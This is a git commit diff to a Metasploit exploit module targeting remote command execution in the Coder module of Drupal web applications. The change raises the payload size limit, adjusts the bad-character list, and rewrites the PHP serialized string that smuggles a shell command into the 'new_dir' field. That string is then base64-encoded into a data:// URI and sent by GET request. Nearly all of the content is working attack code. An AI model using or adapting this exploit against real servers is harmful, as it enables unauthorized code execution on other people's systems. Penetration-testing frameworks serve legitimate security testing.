Extending Space limitation up to 250

mdisec · mdisec · commit ba79579202be · 2016-08-12T22:32:49.000+03:00
diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -36,9 +36,9 @@ def initialize(info={})
       'Privileged'     => false,
       'Payload'        =>
         {
-          'Space'       => 225,
+          'Space'       => 250,
           'DisableNops' => true,
-          'BadChars'    => "\x00\x2f",
+          'BadChars'    => "\x2f",
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
@@ -80,10 +80,10 @@ def exploit
     p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
     p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
     p << 's:7:"new_dir";s:'
-    p << (payload.encoded.length + 14).to_s
-    p << ':"f --help && '
+    p << (payload.encoded.length + 4).to_s
+    p << ':"-v;'
     p << payload.encoded
-    p << ' #";s:4:"name";s:4:"test";}}}'
+    p << ';";s:4:"name";s:4:"test";}}}'
     payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
     send_request_cgi(
       'method' => 'GET',
